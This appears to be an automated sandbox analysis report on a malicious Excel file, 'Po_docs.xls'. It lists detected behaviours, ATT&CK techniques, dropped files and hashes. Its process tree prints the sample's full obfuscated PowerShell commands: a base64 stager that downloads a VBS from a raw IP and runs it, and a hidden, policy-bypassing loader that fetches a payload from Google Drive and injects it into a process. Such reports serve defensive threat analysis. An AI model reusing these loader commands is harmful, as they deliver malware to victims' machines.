26daad7f2b88dfa67240b07b416d9261909f0398e17e8a62e29a8e324d49d94d

Analysis

max time kernel
119s
max time network
121s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
25-10-2024 09:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Po_docs.xls
Size

98KB
MD5

ad791e87a785989bf5dc066db100e652
SHA1

dabe7215a329944fd262906aae16b9c9ec689c0e
SHA256

26daad7f2b88dfa67240b07b416d9261909f0398e17e8a62e29a8e324d49d94d
SHA512

c07fab2453f8efbb4c37a5b53e2f29574c770d07b4ba3ead5b07b2365c8214863f273474091fe54bdafcd024fa236ab4c97e32bd8bbb68f75378247b27d62ab3
SSDEEP

1536:NiqHy1S6F8b2SQrEkawpoXIoAD4qBYs8N3Ff6iugVOUYoFMz7C9Rvrp2CU:3eFHrE2sIo8LQt6yTMvIrp

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

Blocklisted process makes network request 5 IoCs

flow	pid	Process
12	2568	mshta.exe
13	2568	mshta.exe
15	1096	PoWErSHEll.EXE
17	1800	powershell.exe
19	1800	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2936	powershell.exe
1800	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
1096	PoWErSHEll.EXE
2784	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
16	drive.google.com
17	drive.google.com

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	PoWErSHEll.EXE
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PoWErSHEll.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2072	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
1096	PoWErSHEll.EXE
2784	powershell.exe
1096	PoWErSHEll.EXE
1096	PoWErSHEll.EXE
2936	powershell.exe
1800	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1096	PoWErSHEll.EXE
Token: SeDebugPrivilege	2784	powershell.exe
Token: SeDebugPrivilege	2936	powershell.exe
Token: SeDebugPrivilege	1800	powershell.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
2072	EXCEL.EXE
2072	EXCEL.EXE
2072	EXCEL.EXE
2072	EXCEL.EXE
2072	EXCEL.EXE

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 2568 wrote to memory of 1096	2568	mshta.exe	33
PID 2568 wrote to memory of 1096	2568	mshta.exe	33
PID 2568 wrote to memory of 1096	2568	mshta.exe	33
PID 2568 wrote to memory of 1096	2568	mshta.exe	33
PID 1096 wrote to memory of 2784	1096	PoWErSHEll.EXE	35
PID 1096 wrote to memory of 2784	1096	PoWErSHEll.EXE	35
PID 1096 wrote to memory of 2784	1096	PoWErSHEll.EXE	35
PID 1096 wrote to memory of 2784	1096	PoWErSHEll.EXE	35
PID 1096 wrote to memory of 536	1096	PoWErSHEll.EXE	36
PID 1096 wrote to memory of 536	1096	PoWErSHEll.EXE	36
PID 1096 wrote to memory of 536	1096	PoWErSHEll.EXE	36
PID 1096 wrote to memory of 536	1096	PoWErSHEll.EXE	36
PID 536 wrote to memory of 1704	536	csc.exe	37
PID 536 wrote to memory of 1704	536	csc.exe	37
PID 536 wrote to memory of 1704	536	csc.exe	37
PID 536 wrote to memory of 1704	536	csc.exe	37
PID 1096 wrote to memory of 2904	1096	PoWErSHEll.EXE	39
PID 1096 wrote to memory of 2904	1096	PoWErSHEll.EXE	39
PID 1096 wrote to memory of 2904	1096	PoWErSHEll.EXE	39
PID 1096 wrote to memory of 2904	1096	PoWErSHEll.EXE	39
PID 2904 wrote to memory of 2936	2904	WScript.exe	40
PID 2904 wrote to memory of 2936	2904	WScript.exe	40
PID 2904 wrote to memory of 2936	2904	WScript.exe	40
PID 2904 wrote to memory of 2936	2904	WScript.exe	40
PID 2936 wrote to memory of 1800	2936	powershell.exe	42
PID 2936 wrote to memory of 1800	2936	powershell.exe	42
PID 2936 wrote to memory of 1800	2936	powershell.exe	42
PID 2936 wrote to memory of 1800	2936	powershell.exe	42

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Po_docs.xls
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2072

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2568
- C:\Windows\SysWOW64\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE
  "C:\Windows\SysTeM32\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE" "powErShEll -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe ; Iex($(iex('[sYStEm.TexT.eNcODInG]'+[chAr]58+[ChaR]0x3A+'utF8.getsTRinG([systEM.ConvERt]'+[cHAr]58+[ChAr]58+'FrombASE64sTrInG('+[ChaR]0x22+'JGI0bEg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJFcmRlZklOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpsR2dqcHBFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRFlCbFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSXlHVnUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9JVGloSlJ5WSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJTIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWXdvQmNHT2duaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGI0bEg4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS8zNS9lZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnRJRiIsIiRFTnY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyIsMCwwKTtzdGFSVC1zbEVlUCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyI='+[CHAR]0X22+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1096
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe
    3⤵
    - Evasion via Device Credential Deployment
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2784
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\foq5zaav.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:536
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF393.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF392.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1704
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2904
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTnY6Q29tU3BlQ1s0LDE1LDI1XS1Kb0luJycpKCAoJzBRYWltYWdlVXJsID0gZjdWaHQnKyd0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dScrJ3IgZjdWOzBRYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7MFFhaW1hZ2VCeXRlcyA9IDBRYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoMFFhaW1hZ2VVcmwnKycpOycrJzBRYWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKDBRYWltYWdlQnl0ZXMpOzBRYXN0YXJ0RmxhZyA9IGY3Vjw8QkFTRTY0X1NUQVJUPj5mN1Y7MFFhZW5kRmxhZyA9IGY3Vjw8QkFTRTY0X0VORD4+ZjdWOycrJzBRYXN0YXJ0SW5kZXggPSAwUWFpbWFnJysnZVRleHQuSW5kZXhPZigwUWFzdGFyJysndEZsYWcpOzBRYWVuZEluZGV4ID0nKycgMFFhaW1hZ2VUZXh0LkluZGV4T2YoMFFhZW5kRmxhZyk7MFFhc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIDBRYWVuZEluZGV4IC1ndCAwUWFzdGFydEluZGV4OzBRYXN0YXJ0SW5kZXggKz0gMFFhc3RhcnRGbGFnLkxlbmd0aDswUWFiJysnYXNlNjRMZW5ndGggJysnPSAwUWFlbmRJbmRleCAtIDBRYXN0YXJ0SW5kZXg7MCcrJ1FhYmFzZTY0Q29tbWFuZCA9IDBRYWltYWdlVGV4dC5TdWJzdHJpbmcoMFFhc3RhcnRJbmRleCwgMFFhYmFzZScrJzY0TGVuZ3RoKTswUWFiYXNlNjRSZXZlcnNlJysnZCA9IC1qb2luICgwUWFiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgWWJJIEZvckVhY2gtT2JqZWN0IHsgMFFhXyB9KVstMS4uLSgwUWFiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldOzBRYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoMFFhYmFzZTY0UmV2ZXJzZWQpOzBRYWxvYWRlZEFzJysnc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6JysnTG9hZCgwUWFjb21tYW5kQnl0ZXMpOzBRYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoZjdWVkFJZjdWKTswUWF2YWlNZXRob2QuSW52b2tlKDBRYW51bGwsIEAoZjdWdHh0LlJSRVBMTVMvNTMvMTQxLjY3MS4zLjI5MS8vOnB0dGhmN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGYnKyc3VkFkZEluUHJvY2VzczMyZjdWLCBmN1ZkZXNhdCcrJ2l2YWRvZjdWLCBmN1ZkZXMnKydhdGl2YWRvZjdWLGY3VmRlc2F0aXZhZG9mN1YsJysnZjdWZGVzYXRpdmFkb2Y3VixmN1ZkZXNhdGknKyd2YWRvZjdWJysnLGY3VmRlc2F0JysnaXZhZG9mN1YsZjdWZGVzYXRpdmFkb2Y3VixmN1YxZjdWLGY3VmRlc2F0aXZhZG9mN1YpKTsnKS5SZXBsQUNFKChbY2hBcl04OStbY2hBcl05OCtbY2hBcl03MyksJ3wnKS5SZXBsQUNFKCdmN1YnLFtTdHJJTkddW2NoQXJdMzkpLlJlcGxBQ0UoKFtjaEFyXTQ4K1tjaEFyXTgxK1tjaEFyXTk3KSwnJCcpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2936
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdesat'+'ivadof7V, f7Vdes'+'ativadof7V,f7Vdesativadof7V,'+'f7Vdesativadof7V,f7Vdesati'+'vadof7V'+',f7Vdesat'+'ivadof7V,f7Vdesativadof7V,f7V1f7V,f7Vdesativadof7V));').ReplACE(([chAr]89+[chAr]98+[chAr]73),'|').ReplACE('f7V',[StrING][chAr]39).ReplACE(([chAr]48+[chAr]81+[chAr]97),'$') )"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1800

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

Filesize
717B

MD5
822467b728b7a66b081c91795373789a

SHA1
d8f2f02e1eef62485a9feffd59ce837511749865

SHA256
af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

SHA512
bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\807E68DC1EB352B6034064E6C5472B5E

Filesize
345B

MD5
048982a0b7545833aebb55d604f0b105

SHA1
95da2e6c4595d586f3f19fc5af9d13173f2ea530

SHA256
5051430635b887b0dbee43e640775ed52226dcb9e4efd89b216bfed8d5953b8b

SHA512
5bba8ff2c42028c0e3dbbbcd936f8f85e1872644ee7aab6213ee4f83455e9a9b6ada76c761348fcf3fd9c09ee5014b7b412b20b0961d61693340356067557118

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

Filesize
192B

MD5
b55b8a2886117dc77cf0c1c5cd0471ce

SHA1
1e9af344caa06731befcad5aa875d18fa98685c2

SHA256
a0b9873d30ac77c5177863425b890b9a95287bee5430d186f1261ffe48af4cde

SHA512
2bab5ddfa3f5174a441da057524890d32be0516cb1ff2f608232173de15266de7cef0e28acaa0f46f11e1575a395016f3bab272be66dca5a88296c6ffb3b62df

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\807E68DC1EB352B6034064E6C5472B5E

Filesize
540B

MD5
92b936df2ec475f895323ebe167b65fc

SHA1
0bc3d0bb5d20fbec4a1cd238094afaf09c0cc8a2

SHA256
1d5470c2a96a9e64ac3c15711eed7b9fa713f2d130db242e3a7774d19beb8a5d

SHA512
8dcbf49809411fc7d21711b32218056c754e0228d5cf8159d5134d6f7353a7f3b5c95c00f3dc99e67512c8768c2709aca4ff3ae0da73951b94eba7be82de79ad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WCATT3E5\nicegirlwithnewthingswhichevennobodknowthatkissingme[1].hta

Filesize
8KB

MD5
ac5ddf42936502df781ca19af34e2ad5

SHA1
4374c6d1401f73e08fc8769f7194c22053a2a286

SHA256
9fbcf1b9b199cab0599c62786d6e1c00a6386466390a19dd879e09f093789bf5

SHA512
f826440296aad8e9027e121de7c3994ec8822f5ba12f65de94228500505dcfcc0d660b560a6217b4e869e28598ab2fd3338ee3470b4edf21d6aec2ab37304a77

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabED4C.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESF393.tmp

Filesize
1KB

MD5
e0e5a4841b1cd20699103d21bae2d7f5

SHA1
f3ef0f74a2e30fc879219d0d9ec29f642d14a16f

SHA256
273d2deea1f2d280cdf8005a9ecce322e9ce91ed7481947531ad67426542806d

SHA512
1ea109c9f3d236273aac01729ed5843bbc38816a1a57787eac7b41221d17c8648080ec917f7ad1b248340c6d85dec6f1fda909713abea9b8bdd6a85949835df7

Download Submit
C:\Users\Admin\AppData\Local\Temp\foq5zaav.dll

Filesize
3KB

MD5
75e61c1056e5216a6f908636d2eacd6f

SHA1
b430e101312b08773b1f3fa45eff2e32aeac46f9

SHA256
527ea996ef2408830b342a920c7fc4f8242971687c16da0c48b949bc37b4ed8d

SHA512
568fcf68aa73b49d5cb688023419efd2c85660f24aaf874e6a275a4d93eab7ec352fdd92a3f215f5a79ae40b117737c2277b9736c685a2505f167f9559b9fe66

Download Submit
C:\Users\Admin\AppData\Local\Temp\foq5zaav.pdb

Filesize
7KB

MD5
523437a67d32dc9e636b4c46e6c8c8c4

SHA1
6b68cd7c4b3fa4b002dc69e985db24b759a48dd0

SHA256
73c53aa008d004b9de67cb73c9b3c35296336e856a767a99c3a5579612dd14e3

SHA512
31dce9d0d0aca0e7e733a870f5035d74f031e28eaa8e5da2b8b4ea88a0db675030f9a9c469073c90e5192525a0653c73b1a716973b2f38c60351419ecad7347e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
bc555e81c03b5d73ea3ebcd011363a7f

SHA1
357bf2bad57ed8e77969c7ac6bc74bf36f54fbbf

SHA256
cbf66f9e4425fb49f62a00632a2091fb21980758a3550677e099d7edd12b4549

SHA512
7740c5b5ffd7e5d39777172a38782146706a69d4ed102f3ae6322978f2188db109bd4831520b58f70e3a1f6db1c0851f4c8430742cc7c92f6129f477c45386d2

Download Submit
C:\Users\Admin\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS

Filesize
137KB

MD5
fe9e18e3366ca7ac8c21eb1ce0631d9c

SHA1
51bc2bc37e87e2d64129cad63df697a68ee3b9d6

SHA256
01c6399fc31b4cbfcf8e851ff3ff433d36b46da2577f9230b9c78b2cbf790912

SHA512
7dca4fb22f5f1a6e08f6c993a7b159863b8b1a8898429aed78582641bc2340ce2fbe3e92f6ec5f9d6ec5c74a14009f77ce87602bea7ba59c4ea1e092d5a9f8f7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCF392.tmp

Filesize
652B

MD5
a9f273a459f34239d15ad49890a2cfbc

SHA1
d411b4def36274703cecfb9f66c612f76e457cb2

SHA256
d9a06c6ce4e7b865492e9fbc24b763d6f13fe50f412fcf1fdca4471d10378b85

SHA512
e13efac02438d5b12b4a22e248f260a19bf6fa33d807edde2ce89d7083fdfc1cc87669edc4203f63eced431f992a66edc6e8ea9c465512256a29e8e9c18b9e4b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\foq5zaav.0.cs

Filesize
471B

MD5
465b774d7a1a641088ff65cb56d1755b

SHA1
d65ff3c3ecd67b7da02d199d649abb75a8c64879

SHA256
737ceb1cff20744c7d2eb5139717221cf2c96f10d05d5fffd3d916fd69a6d025

SHA512
665f11dfa5a6a79b89c49724ad1943baea2ea54cb204ef3712abb948218064410b42ee96b29f067fc635bc71ec85295603567bf2e9121d381fa2dfbc6c07ea68

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\foq5zaav.cmdline

Filesize
309B

MD5
682f36e8198ae980975ee1ac0a92320c

SHA1
15ce3a92240b901247ec7988e757ba20840ac691

SHA256
fa2a28d57e65ef8cacd8d8d1ee4f481eb4820e8cb0dc8e496eb8cb4744643eae

SHA512
7206f6868cbd8a2982b8ee3e13a7e5d1305091d47c20f423fa59d103078531d2d5ddcce5e3de20975a14c3b68bbc84be1ef247d8c9163d36a9107703d48b64ce

Download Submit
memory/2072-17-0x0000000001F00000-0x0000000001F02000-memory.dmp

Filesize
8KB

Download
memory/2072-1-0x000000007278D000-0x0000000072798000-memory.dmp

Filesize
44KB

Download
memory/2072-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2072-74-0x000000007278D000-0x0000000072798000-memory.dmp

Filesize
44KB

Download
memory/2568-16-0x0000000000F20000-0x0000000000F22000-memory.dmp

Filesize
8KB

Download